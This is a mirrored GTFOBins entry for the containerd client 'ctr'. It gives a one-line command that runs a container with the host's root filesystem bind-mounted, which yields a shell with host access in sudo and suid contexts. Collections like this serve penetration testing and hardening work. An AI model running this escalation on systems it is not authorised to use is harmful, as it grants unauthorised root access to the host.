1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2026-03-07 14:36:23 +01:00
GTFOBins.github.io/_gtfobins/ctr
2026-01-16 19:17:21 +01:00

16 lines
323 B
Plaintext

---
functions:
shell:
- code: |-
ctr run --rm --mount type=bind,src=/,dst=/,options=rbind -t docker.io/library/alpine:latest x
comment: |-
An image must be already present, for example:
```
ctr images pull docker.io/library/alpine:latest
```
contexts:
sudo:
suid:
...